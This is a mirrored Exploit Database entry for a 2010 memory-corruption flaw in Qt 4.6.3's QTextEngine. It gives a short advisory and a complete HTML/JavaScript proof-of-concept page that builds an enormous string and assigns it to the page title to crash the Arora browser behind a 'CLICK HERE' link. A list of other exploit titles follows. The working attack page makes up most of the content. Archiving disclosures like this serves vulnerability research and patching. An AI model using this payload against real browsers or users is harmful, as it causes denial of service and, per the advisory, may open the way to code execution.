Qt 4.6.3 – ‘QTextEngine::LayoutData::reallocate()’ Memory Corruption

Exploit Database
56 阅读

作者： D4rk357

日期： 2010-07-13
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/34364/

source: https://www.securityfocus.com/bid/41873/info

Qt is prone to a remote memory-corruption vulnerability.

Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. 

<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
var buffer = "";
for (var i = 0; i < 8000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 8000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>

last Exploits
Qt 4.6.3 – ‘QTextEngine::LayoutData::reallocate()’ Memory Corruption的更多信息

Adobe Flash TextField.sharpness Setter – Use-After-Free：
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow：
Novell Groupwise Internet Agent – IMAP ‘LIST LSUB’ Remote Code Execution：
Light Audio Player 1.0.14 – Memory Corruption (PoC)：
Adobe (Multiple Products) – XML External Entity / XML Injection：
Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 – Remote Denial of Service：
Intel Video Codecs 5.0 – Remote Denial of Service：
Microsoft Windows Explorer – Denial of Service：